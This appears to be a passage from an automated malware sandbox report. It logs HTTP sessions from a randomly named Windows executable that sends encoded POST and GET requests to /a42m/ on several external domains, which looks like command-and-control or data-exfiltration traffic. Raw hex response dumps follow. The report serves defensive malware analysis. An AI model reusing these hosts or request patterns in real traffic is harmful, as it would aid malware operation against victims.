                          Data Ascii: vH5=c6IUh8w1xKAXydaH2zhcPnSAhiNdiVumx8FtL2s5FyXk6tOP0+yOXryMlcG/Zxu8G1BennxwdAqgDN4Cs1HKN1WDsnB4CulK5bgDGi8VSHJWpxSXPOpDu5P0SMS+VdjUqf5U4fJbuSCO6cmqFFPQerZQPk72yg7Hc9WJrE1IvDnv8Xquxw6L8pDbi/Qs+2yzM+CLWI689BFi0uxcFn8Gi1cS/7nzL8U9So8+5+OipwkajHwL/svx1iQybOWMjPFNJMQJAXEEWk+N5ZUrZPuGWgghN346RLwe97gcF7FBGSaH68aod/ohKPZu2EYCmUhl/SM2e9jgNRoZhI9OBcqMSk8bZuP8AMRCEWR6acY2aQXaCLAoLdmarNX2x0JTorbEVsJGXTx9ZGQ9t11lCMv6IB3y7gcaaWnNSQP/I3tU8cGQDys237/uCLhe2CrUjDN5dXNcTByjBu4nIYbF6I2hbqcuKYxDNYn09ehWqW1tMODkan8eyImzIx+tsOVBOC9S6AB1A2Lpgq8ewTQxZeCKJmgEbqgbiYYVYGqjdWs56hyUdefPubronyQAv4agmqPS0I25L/JMAHj6CORFKh+7da2nCbSJQwKK9V72SVrSk3mlfK8PegMJ9NGybYo5b3Q6sxC1bjg3yk9IuAZra1+6Rry7pLnFkKpjRbfzvsDEVb542RBYvF1EHjUWZ4GesJm+YiN584DrQq1nLRlO/gptW1s+o/TFx3sv7LCkf3iQFQsBC5S+xRR/jjLE9bN3+dTRvCNbpJkFVqj1xJQ3icGoXJdVC2TZSB65s3FHpps1kwbhRI6b3GOVUtZA7Rg1um3SK5PTaQh5gZS2klBnPmrn7UyYvZKA8nUaSM2cvRrXkxClmfyUEPFwjakFHDQlOTRh7ax3vUmfaB2IUlFCioOS5a4H39t56KVMvqblwdvY8gB2EaGoOVr+IDZrZ6PnYAOtPfgChUoen/o0xdmjwXhGaU1QLpodjrgrLLNnO2KYJaLEJ50a [TRUNCATED]
                          May 23, 2024 15:19:02.923065901 CEST1236INHTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=a31f00fc16b0f85f09508c61c4210a7a3b6cab4e71ea1aab3538c6d4b522c7cf; expires=Tue, 19-Nov-2024 13:19:02 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:19:02 GMT
                          server: LiteSpeed
                          Data Raw: 37 30 38 64 0d 0a f4 ff 1f 8a 0c ca 18 07 00 80 ef 3d 34 22 45 ed 87 5d 22 72 d2 ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 5f 02 83 63 02 ff 61 5a b6 e3 7a bc 3e bf ff fc bd da 7f 9b 99 7c fc 2b 67 a7 36 a4 42 80 ed c4 0e 2e 49 1f 69 ef e4 ce e6 b6 d3 34 f7 15 67 18 81 0e 58 09 48 54 12 c6 5e 2f ff 2f b3 aa b3 e3 72 fa ad 78 d1 19 ae 02 0c 48 68 73 d8 bd 64 f6 b6 66 56 f7 3e 7e 48 fa b2 a9 40 82 02 e4 25 3d 3e 1e e6 72 1d f3 f3 4d ad a9 a6 c2 a3 6b 0c 07 58 84 85 53 a5 d2 ea 5c 34 d4 3f 52 e9 18 4f a4 c3 7d bf 56 f5 dd f3 f3 e5 1c cc 9e 55 0f d3 7b 6f 41 45 05 94 12 d4 ae da 33 80 00 a2 4d 32 ed 20 53 5b 67 d6 af 2f b5 f2 3c 7b 39 fd e8 08 ca 67 4e be f4 7f 8d 6d ad 2c d6 b8 13 d6 80 45 b0 0b ea a2 09 82 5d ad 81 42 f7 bf d7 ea e5 ff 3b 26 80 8d 12 34 fd 31 33 1b 19 c5 84 aa 6e 5d f0 a4 27 a0 ee 1e a0 0e 40 1d 40 04 ea 00 62 dd aa 7b ef 7b 7a 92 7a d5 61 67 7b 62 dc dd e3 9e 14 7f 9e 75 48 19 1a 1a cf 8c c7 21 65 6a 02 34 e3 34 9f da c8 80 7d 33 63 ff 9f 99 96 e1 bd 47 ee 19 19 1b 1a 1f ae 22 5d [TRUNCATED]
                          Data Ascii: 708d=4"E]"rPH`?_caZz>|+g6B.Ii4gXHT^//rxHhsdfV>~H@%=>rMkXS\4?RO}VU{oAE3M2 S[g/<{9gNm,E]B;&413n]'@@b{{zzag{buH!ej44}3cG"]4n@JA~LP 2hi,MUuzjnkg(B)" Q2FzK}@UFYVY/_VM:0<c8)!*{<k<6{S,,Vg*KcL[f""99AEDAl7s,NbVwMo&cU4*I0WX|}PONVNV<qm7$Hvd<
                          May 23, 2024 15:19:02.923229933 CEST1236INData Raw: 49 36 e4 4e d6 d2 e9 03 91 ff 7a 0f dc bc a1 93 aa 1e a3 cc dd 23 74 9d 99 d1 85 76 76 76 b0 c3 8e 99 d2 6b e3 1f a7 44 e9 21 dd 16 ce 48 74 e3 7d b0 27 db bf 10 71 c7 0e b3 99 f8 fc a8 9b 5f 80 d9 4d a9 95 d5 0d b2 46 d7 fe ec 87 3c 60 f3 3f dd
                          Data Ascii: I6Nz#tvvvkD!Ht}'q_MF<`?G|3Dkd++<k&mWf?|;Qdw+uXVI&Q$J+gYu iF41|CaS)o*DGwe1"C."oU?|$#'('@
                          May 23, 2024 15:19:02.923969984 CEST1236INData Raw: 52 bf d5 9f 1b 5d f8 cf f8 42 4f ee d8 61 5a 07 ac 8f 01 e5 c0 98 a9 b4 f2 e5 f9 f6 7d 13 d0 93 e2 2d a6 30 74 bf d0 3a 4f c0 9a 4a 97 05 1f 5e bd d7 52 f8 9c 69 75 54 39 33 b4 15 18 9c 4a 5f 65 58 b8 ff 61 70 e6 d0 b4 52 71 87 7e 40 9d af 82 b1
                          Data Ascii: R]BOaZ}-0t:OJ^RiuT93J_eXapRq~@~*vA0cPr7G"8KsZg1S%Z@_ybI#:ppi`T?cvP)xZVp=^L:}|1l,H5:M
                          May 23, 2024 15:19:02.923985004 CEST1236INData Raw: 5e c2 ca 2c 9e 3a 47 8d c6 62 06 ca 9c 96 18 e5 c2 a8 ec 78 68 3b 39 76 e7 86 ab f9 41 3a 37 dc ee 94 5e 3c a5 6b f1 eb 4b 54 53 dd 94 5e 29 82 7a 0b cf fc 47 eb 2d dc 9f 1c fd 4d cf b4 b3 8b 89 27 7a 0c fa d6 c2 b3 ee ba ba cf 51 96 5e 4e 26 61
                          Data Ascii: ^,:Gbxh;9vA:7^<kKTS^)zG-M'zQ^N&a?H[xzgs68%dfD=F4QS9=Y3NI|p>alA=}+MoSUc:w_~'UN3;nj
                          May 23, 2024 15:19:02.925281048 CEST1236INData Raw: 1a 40 d6 a1 8f 84 64 23 f3 93 77 5c ec 22 a8 c6 77 b3 37 a1 c5 c0 2d 00 fa f1 1c 15 b5 04 e9 77 c4 7a 79 3c 39 60 55 5e c3 8a e5 5e 34 86 17 df ad e3 9e 02 89 a3 0d 32 23 14 47 47 64 36 0f d4 1c 99 45 c3 62 f2 cb 33 47 2e e0 90 1a 76 a1 49 a8 a5
                          Data Ascii: @d#w\"w7-wzy<9`U^^42#GGd6Eb3G.vI3fuO_[Oe&`FSPDOFeL.HHz/6Fq/C\lC[-6vIGcjYHz,:+bS$=X_Q1j,Thx
                          May 23, 2024 15:19:02.926070929 CEST1236INData Raw: cd 9b 9f 43 fe 48 23 91 4a 0f 6b 88 e3 92 fb ab 0f 1d e8 91 e5 16 0e 4e 3c 9a e8 3d 58 75 27 1d 52 97 90 0d 06 cd 72 56 c8 3a 6f 0d 2c ad 44 56 c9 76 fa 23 73 7e 8d b6 20 1f e2 d1 d5 84 4c 2a 9f 61 b3 44 0d 89 c6 00 e1 d8 22 c8 0a c1 94 74 b3 fa
                          Data Ascii: CH#JkN<=Xu'RrV:o,DVv#s~ L*aD"tl\Kl~5]^;6_ .Xs\zL:NJzk1@wb=y^"-,WIiU9f0:(lWweGz`XlDy@_mXV9F-J
                          May 23, 2024 15:19:02.926084042 CEST776INData Raw: ef 00 50 91 de e2 11 c0 16 12 9e 7c 1c e4 85 87 c8 d2 18 28 64 87 9b 74 49 5b 4a 53 7a 2d b4 1e 79 a6 81 fb 4f c8 93 20 70 92 04 4e 39 81 53 41 e0 a4 08 9c ca b4 0c ee 0f 58 71 5e bb c2 88 d5 56 4c 65 28 50 bb 75 ff a4 4f 40 bf 5c 45 ed af 8f 93
                          Data Ascii: P|(dtI[JSz-yO pN9SAXq^VLe(PuO@\EkkT" F|e2"L-C`hd.JZ{CP6~n-F^StgdQk8rJ<-:_@]Y:w;LNnd
                          May 23, 2024 15:19:02.926095009 CEST1236INData Raw: 3b 63 e5 60 92 bc 8a a2 60 cd f6 ef 48 36 4a 5c a4 c2 5c a2 6a b7 e1 61 63 b8 17 b0 9b 49 27 7a e9 2f 36 3e a9 c7 51 a2 52 1c 00 70 41 17 dc 25 e2 eb a3 8b 14 9b 5e b6 5d a7 f1 a3 48 35 6e a1 50 1e b1 ca 7b 3d 99 f9 fc 0c 7d 08 1c 7b f4 26 42 8b
                          Data Ascii: ;c``H6J\\jacI'z/6>QRpA%^]H5nP{=}{&BRx 1%c,us=xZlum^Gk==Bf96;^ *zj|zs6alvu'#e76tq&e{1-5K[%
                          May 23, 2024 15:19:02.927351952 CEST1236INData Raw: 19 74 e3 78 d0 22 1a 70 cc af 7b 45 33 49 f4 34 48 fe f2 88 6d 74 02 f3 03 b6 70 86 4d 08 57 00 05 c9 5f d6 8f 52 a3 78 9a bf 9f 24 cc 6c b6 ce 43 b0 71 54 dc 24 d9 0d a0 55 fc 2c 22 22 ee e9 dc 82 c7 23 71 d0 ce 84 d0 ae d3 24 09 5b 6b 18 64 2e
                          Data Ascii: tx"p{E3I4HmtpMW_Rx$lCqT$U,""#q$[kd.7RMU# h_LB?%X#dS(pal>;\l%lGcQ3r2)$es6=TV%lKsg<*o]:C1>5LtszlZ_
                          May 23, 2024 15:19:02.928111076 CEST1236INData Raw: 09 56 d0 4b cf 6a 96 87 2e 39 84 8d 36 15 be 5a 20 c7 73 4d e0 21 1d d1 fa 1e 5d 68 9d e1 0e eb e3 c5 48 c5 03 22 2d 95 0a 9f 3d 11 f7 ad 85 af 36 c4 83 33 fc e4 cb 73 f6 dc 90 a1 34 ef d8 48 b9 fc bf c6 0c 8f bf dc c0 5f f9 21 ef 3f c2 09 91 85
                          Data Ascii: VKj.96Z sM!]hH"-=63s4H_!?VF!:0yPiC%\&N{Iq)ObE*.^^R,.XTc,an'u-AqxT<598DT}EqBRWX}y+l
                          May 23, 2024 15:19:02.928472042 CEST1236INData Raw: fd c2 8d 7b 64 ce 50 d7 06 d2 c2 d4 39 cf 86 4d 32 1c 3a 83 05 7c 1e dc 6f f8 c2 5d b9 7b 60 9b 39 0f 52 e0 42 f4 07 0d 6a fd d6 58 2d 6b b6 7c 49 39 83 08 26 87 73 d2 04 56 10 bb 7e 37 02 cd 3d 6d ed 8b 42 e0 16 f5 1e 93 d6 52 9b 5d e5 9c dd 33
                          Data Ascii: {dP9M2:|o]{`9RBjX-k|I9&sV~7=mBR]3ijqrCS&]Cs%KX3WpNZRn%RCN6]A{rO|*]:2iFgNF=c'MyGI1El%ltQEju^7y


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.553681104.194.9.31807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:04.549344063 CEST490OUTGET /a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.digitoxmarketing.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:05.396291971 CEST654INHTTP/1.1 301 Moved Permanently
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=196441b8a2c2c8859576ceba02afe239d02065f706b2b9ac955c469db24b2597; expires=Tue, 19-Nov-2024 13:19:05 GMT; Max-Age=15552000; path=/
                          x-redirect-by: WordPress
                          location: http://digitoxmarketing.com/a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww==
                          content-length: 0
                          date: Thu, 23 May 2024 13:19:05 GMT
                          server: LiteSpeed


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.553682192.74.233.3807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:20.073625088 CEST741OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 71 4a 4b 6e 62 4f 74 69 37 52 69 33 34 52 46 44 34 6d 42 65 41 30 76 4d 42 4e 6f 4e 6c 61 69 4a 46 56 78 69 79 59 44 6b 6d 78 42 33 5a 45 75 4b 33 5a 6c 61 66 52 71 78 65 45 36 6e 45 76 5a 56 76 39 6b 30 31 54 38 62 43 72 57 54 39 42 65 77 6c 59 62 78 45 67 75 35 2f 57 6e 58 7a 6b 6b 42 4b 31 70 47 42 59 31 69 44 6d 5a 2b 68 36 31 76 75 68 43 69 37 5a 4c 72 43 56 45 47 58 67 31 67 72 76 39 73 7a 59 73 45 43 6d 34 34 63 4f 6f 62 77 5a 30 4e 55 54 66 43 7a 6f 6a 4b 45 39 4f 79 6d 6c 2f 45 50 46 35 37 74 6f 67 6e 2b 44 68 2b 47 75 58 74 44 6b 77 4d 79 67 33 50 42 73 68 78 32 4b 4c 66 4c 65 38 3d
                          Data Ascii: vH5=qJKnbOti7Ri34RFD4mBeA0vMBNoNlaiJFVxiyYDkmxB3ZEuK3ZlafRqxeE6nEvZVv9k01T8bCrWT9BewlYbxEgu5/WnXzkkBK1pGBY1iDmZ+h61vuhCi7ZLrCVEGXg1grv9szYsECm44cOobwZ0NUTfCzojKE9Oyml/EPF57togn+Dh+GuXtDkwMyg3PBshx2KLfLe8=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.553683192.74.233.3807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:22.606189966 CEST761OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 71 4a 4b 6e 62 4f 74 69 37 52 69 33 35 31 35 44 2b 31 35 65 47 55 76 50 4c 74 6f 4e 75 36 69 46 46 56 74 69 79 61 76 30 6d 6b 52 33 5a 6b 65 4b 32 59 6c 61 61 52 71 78 52 6b 37 6a 61 66 59 5a 76 39 35 48 31 57 55 62 43 72 43 54 39 42 75 77 69 72 6a 79 4c 51 75 37 33 32 6e 5a 33 6b 6b 42 4b 31 70 47 42 59 67 71 44 6d 68 2b 69 4a 39 76 75 44 71 68 33 35 4c 6b 55 46 45 47 54 67 31 73 72 76 38 44 7a 61 49 75 43 6b 77 34 63 4c 4d 62 77 49 30 4d 44 44 66 4d 75 59 69 44 43 73 4f 38 6f 33 72 4e 47 45 63 38 78 75 67 6a 32 56 4d 55 63 4d 66 46 51 45 63 30 69 7a 2f 34 51 63 41 59 73 70 62 76 56 4a 71 52 33 38 35 2b 78 57 67 61 54 75 2b 71 78 73 79 43 57 64 42 2f
                          Data Ascii: vH5=qJKnbOti7Ri3515D+15eGUvPLtoNu6iFFVtiyav0mkR3ZkeK2YlaaRqxRk7jafYZv95H1WUbCrCT9BuwirjyLQu732nZ3kkBK1pGBYgqDmh+iJ9vuDqh35LkUFEGTg1srv8DzaIuCkw4cLMbwI0MDDfMuYiDCsO8o3rNGEc8xugj2VMUcMfFQEc0iz/4QcAYspbvVJqR385+xWgaTu+qxsyCWdB/


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.553684192.74.233.3807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:25.138051987 CEST1778OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.6whebx.cyou
                          Origin: http://www.6whebx.cyou
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.6whebx.cyou/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 71 4a 4b 6e 62 4f 74 69 37 52 69 33 35 31 35 44 2b 31 35 65 47 55 76 50 4c 74 6f 4e 75 36 69 46 46 56 74 69 79 61 76 30 6d 6b 5a 33 5a 33 57 4b 32 37 64 61 64 52 71 78 59 45 37 75 61 66 59 51 76 39 68 59 31 57 59 4c 43 74 47 54 38 67 4f 77 6e 61 6a 79 51 41 75 37 37 57 6e 59 7a 6b 6b 55 4b 31 35 34 42 59 77 71 44 6d 68 2b 69 4f 4e 76 73 52 43 68 31 35 4c 72 43 56 45 43 58 67 30 46 72 76 6b 35 7a 61 4d 55 43 31 51 34 62 72 38 62 79 2b 6f 4d 63 7a 66 4f 76 59 69 62 43 70 58 2b 6f 33 6e 72 47 45 34 61 78 70 73 6a 6e 45 34 4b 59 66 37 44 44 6e 77 58 70 55 44 6f 43 4b 38 6a 76 36 4c 6a 58 4b 4f 69 36 76 6c 71 37 42 56 5a 57 2b 33 6c 6d 72 43 50 48 62 30 78 64 54 42 7a 46 78 6b 64 6d 33 6d 46 43 78 77 76 73 6a 47 65 35 69 36 78 6b 4b 71 51 2f 57 79 4c 51 43 67 6c 76 71 46 64 46 4b 4d 54 69 32 77 57 45 48 6c 58 43 7a 31 61 73 5a 68 75 44 6e 58 44 68 52 45 4b 71 43 4b 56 4c 39 51 54 42 6b 79 51 62 6b 30 38 56 51 2f 76 6d 46 72 6d 71 77 30 42 55 39 33 32 59 32 65 68 75 49 39 4f 71 48 76 4c 68 42 [TRUNCATED]
                          Data Ascii: vH5=qJKnbOti7Ri3515D+15eGUvPLtoNu6iFFVtiyav0mkZ3Z3WK27dadRqxYE7uafYQv9hY1WYLCtGT8gOwnajyQAu77WnYzkkUK154BYwqDmh+iONvsRCh15LrCVECXg0Frvk5zaMUC1Q4br8by+oMczfOvYibCpX+o3nrGE4axpsjnE4KYf7DDnwXpUDoCK8jv6LjXKOi6vlq7BVZW+3lmrCPHb0xdTBzFxkdm3mFCxwvsjGe5i6xkKqQ/WyLQCglvqFdFKMTi2wWEHlXCz1asZhuDnXDhREKqCKVL9QTBkyQbk08VQ/vmFrmqw0BU932Y2ehuI9OqHvLhB88oYeuCxtGrPJb/JvoIo54RHb0YGehMBVBrKACergbYu6mkXbFoSimRIhcTIYSsbDqMDzg3TCtBeqNjC7M1N9aRvOEzKHRRyP1yqT/A4i51HL6rN3Dl1UVN7/FsSEaxwUl4mKuSrCyEmznGnI6s4PdcCeG/8f7pAMDYxCojI+1hGX8Tf73UQdUc/7Lfh1D3d+Qv7T0ihVZ+tq+PSGGBGhwNpWW80hel5hg0DSCYIAPnfYlOCdMAy0UG/Xg2ZXJ6LRrS/srAjgRiIWAd9oe05pWRah1bJkpXuQdgAGgqOq9Sn02x/DV6zvLSavdrsxyZy0h4xTYtwqCzSilNY1ztxJuctpeJoBIr4ZUiHuM/zxMc4c9re0dDz5k1FaoLrzfvyGx8M+Ocq8xHN4+HfiYOLgrqAFvMs/PaMXDK15s8VF5swcLBwla8zZEn6qngbs/8Emw0q6qa3NtlL5kJss880mkdqsDSPpiFZ/pOCsdv3aWfxTtQwjxDmbX94U2fhbQHtEADT3nIP2EqO9U8faI6xS8sRq7SQSXyBpooOJOFHhS0s5WwUBXSNYWTRJETKTJAAfkglTiJ/20vk+bGJsXiuYEFP9hEqcWxr/BBwkK7xLoHMD370HWtI4CZUVZaly9b6zzWpUn2hq2SYJp+/ubwSZfWQLAkGVBnYDb [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.553685192.74.233.3807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:27.667363882 CEST481OUTGET /a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.6whebx.cyou
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.55368666.29.137.43807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:33.342453957 CEST759OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 77 2b 31 77 6a 71 6b 7a 36 76 42 44 61 43 30 44 52 77 75 72 6c 32 37 4b 4e 2f 45 62 70 4f 63 56 7a 31 32 67 48 70 49 47 57 66 39 59 7a 68 4b 65 6a 68 53 42 6d 62 35 35 34 4b 51 39 70 4d 78 53 74 48 47 76 77 4f 71 47 46 67 69 55 4b 56 6c 4b 61 42 39 45 59 77 4b 77 62 53 51 4a 42 47 75 55 4c 32 57 32 75 38 58 45 41 36 54 4f 45 41 76 77 37 53 50 77 75 51 68 52 52 45 52 4d 7a 35 79 75 6c 33 33 47 6f 59 34 34 72 44 6c 33 53 46 38 7a 54 77 2f 50 6a 58 77 59 6f 34 73 2b 56 38 31 57 36 5a 73 4f 69 72 51 32 35 76 62 2f 35 46 66 61 38 6b 34 47 2b 4d 47 36 59 43 31 64 37 56 59 62 2f 65 42 33 43 4b 30 3d
                          Data Ascii: vH5=w+1wjqkz6vBDaC0DRwurl27KN/EbpOcVz12gHpIGWf9YzhKejhSBmb554KQ9pMxStHGvwOqGFgiUKVlKaB9EYwKwbSQJBGuUL2W2u8XEA6TOEAvw7SPwuQhRRERMz5yul33GoY44rDl3SF8zTw/PjXwYo4s+V81W6ZsOirQ25vb/5Ffa8k4G+MG6YC1d7VYb/eB3CK0=
                          May 23, 2024 15:19:33.932486057 CEST1236INHTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:33 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:33.939410925 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.55368766.29.137.43807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
